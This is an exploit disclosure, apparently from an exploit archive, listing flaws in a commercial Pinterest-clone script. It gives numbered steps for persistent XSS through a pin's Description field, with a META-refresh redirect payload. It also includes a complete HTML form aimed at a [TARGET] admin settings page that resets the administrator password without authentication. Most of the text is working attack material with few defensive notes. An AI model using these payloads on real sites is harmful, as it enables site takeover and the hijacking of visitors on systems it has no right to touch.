########################################## [~] Exploit Title: Pinterestclones Multiple Vulnerabilities [~] Author: DaOne [~] Price: $199.99 [~] Software Link: http://www.pinterestclones.com/ [~] Google Dork: N/A ########################################## [#] [Persistent XSS] How to exploit: 1-go to : http://site.com/createusernamen/ 2-Put anything in the other field [Password & E-mail] etc... 3-Go to: Add > Upload a Pin and Put in [Description] field the XSS code >Example:<META http-equiv="refresh" content="0;URL=http://www.google.com"> 4-Now anyone go to: http://site.com/ will redirected to google.com or exploit your XSS Code. [#] [Remote Change Admin Password] <form action="http://[TARGET]/admin/settings.php" method="post" class="niceform" name="frmname" enctype="multipart/form-data"> Name:<input type="text" class="txtFname" name="name" id="name" size="50" value="Admin"/> User Name:<input type="text" class="txtFname" name="uname" readonly="readonly" id="uname" size="50" value="admin@pinterestclones.com"/> New Password:<input type="password" class="txtFname" name="password" id="password" size="50" value=""/> Confirm Password:<input type="password" class="txtFname" name="cpassword" id="cpassword" size="50" value=""/> Site Slogan:<input type="text" name="txtSlogan" id="txtSlogan" size="50" value="Your online pinboard"/> Site URL:<input type="text" name="txtUrl" id="txtUrl" size="50" value=""/> Admin Email:<input type="text" name="aemail" id="aemail" size="50" value=""/> �Under maintenance:<select name="maintenance"> <option value="No" selected>No</option> <option value="Yes">Yes</option> </select> Maintenance message: <input type="text" name="maintenancemsg" id="maintenancemsg" size="50" value="We are upgrading the site."/> <dl class="submit"> <input type="submit" value="Save" class="submit" name="sbmtbtn" style="width:50px;"/> </form> ########################################## [*] Contact me �www.facebook.com/TGT.LY ##########################################Брой прочитания на тази страница: 1241
Pinterest Clone Script Multiple Vulnerabilities